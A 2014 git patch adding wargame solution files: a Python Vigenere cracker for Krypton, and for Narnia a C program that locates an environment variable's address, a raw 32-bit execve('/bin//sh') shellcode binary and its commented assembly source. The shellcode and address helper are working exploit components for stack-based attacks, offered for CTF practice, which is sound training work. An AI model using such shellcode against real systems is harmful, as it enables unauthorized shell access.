From 56dec30f7077b645efd346e42da2faa19e908b6e Mon Sep 17 00:00:00 2001
From: Mari Wahl <mari.wahl9@gmail.com>
Date: Wed, 8 Oct 2014 02:50:02 -0400
Subject: [PATCH] some small fixes

---
 CTFs/WARGAMES/krypton/vige.py       | 39 +++++++++++++++++++++++++++++
 CTFs/WARGAMES/narnia/getshadd.c     | 12 +++++++++
 CTFs/WARGAMES/narnia/shellspawn     |  1 +
 CTFs/WARGAMES/narnia/shellspawn.asm | 14 +++++++++++
 4 files changed, 66 insertions(+)
 create mode 100644 CTFs/WARGAMES/krypton/vige.py
 create mode 100644 CTFs/WARGAMES/narnia/getshadd.c
 create mode 100644 CTFs/WARGAMES/narnia/shellspawn
 create mode 100644 CTFs/WARGAMES/narnia/shellspawn.asm

diff --git a/CTFs/WARGAMES/krypton/vige.py b/CTFs/WARGAMES/krypton/vige.py
new file mode 100644
index 0000000..8df8dd4
--- /dev/null
+++ b/CTFs/WARGAMES/krypton/vige.py
@@ -0,0 +1,39 @@
+import sys
+from pygenere import Vigenere, VigCrack
+
+
+def get_key(msg):
+  # Vigenere Cypher
+  key =  VigCrack(msg).crack_codeword()
+  dec_msg = VigCrack(msg).crack_message()
+  dec_msg =  dec_msg.replace(" ", "")
+  return key, dec_msg
+
+
+def solve(msg, key):
+  dec_msg = Vigenere(msg).decipher(key)
+  dec_msg =  dec_msg.replace(" ", "")
+  return dec_msg
+
+
+
+if __name__ == '__main__':
+
+  # getting the key
+  with open('cipher', 'r') as f:
+        msg = f.readlines()
+        msg_in = msg[0].strip()
+        key, answer = get_key(msg_in)
+        print 'Message: ' + msg_in
+        print
+        print 'Answer: ' + answer
+        print '(key: ' + key + ')'
+  
+
+  # deciphering                                 
+  key = 'FREKEY'
+  with open('pass', 'r') as f:
+	msg = f.readlines()
+	answer = solve(msg[0].strip(), key)
+	print
+	print "The answer is: " + answer
diff --git a/CTFs/WARGAMES/narnia/getshadd.c b/CTFs/WARGAMES/narnia/getshadd.c
new file mode 100644
index 0000000..5fa88d4
--- /dev/null
+++ b/CTFs/WARGAMES/narnia/getshadd.c
@@ -0,0 +1,12 @@
+// usage: ./getshadd ENVVAR BINARY
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc,char *argv[]){
+        char *ptr;
+        ptr=getenv(argv[1]);
+        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
+        printf("%s will be at %p\n",argv[1],ptr);
+        return 0;
+}
diff --git a/CTFs/WARGAMES/narnia/shellspawn b/CTFs/WARGAMES/narnia/shellspawn
new file mode 100644
index 0000000..5823f90
--- /dev/null
+++ b/CTFs/WARGAMES/narnia/shellspawn
@@ -0,0 +1 @@
+1�Ph//shh/bin��P��P��̀
\ No newline at end of file
diff --git a/CTFs/WARGAMES/narnia/shellspawn.asm b/CTFs/WARGAMES/narnia/shellspawn.asm
new file mode 100644
index 0000000..cd285ad
--- /dev/null
+++ b/CTFs/WARGAMES/narnia/shellspawn.asm
@@ -0,0 +1,14 @@
+BITS 32
+
+xor eax, eax        ; zero eax
+push eax            ; null terminate the string
+push 0x68732f2f     ; push //sh (// is same as / for our purpose)
+push 0x6e69622f     ; push /bin
+mov ebx, esp        ; pass first argument using ebx
+push eax            ; third argument is empty
+mov edx, esp
+push eax            ; second argument is empty
+mov ecx, esp
+mov al, 11          ; execve is system call #11
+int 0x80            ; issue an interrupt
+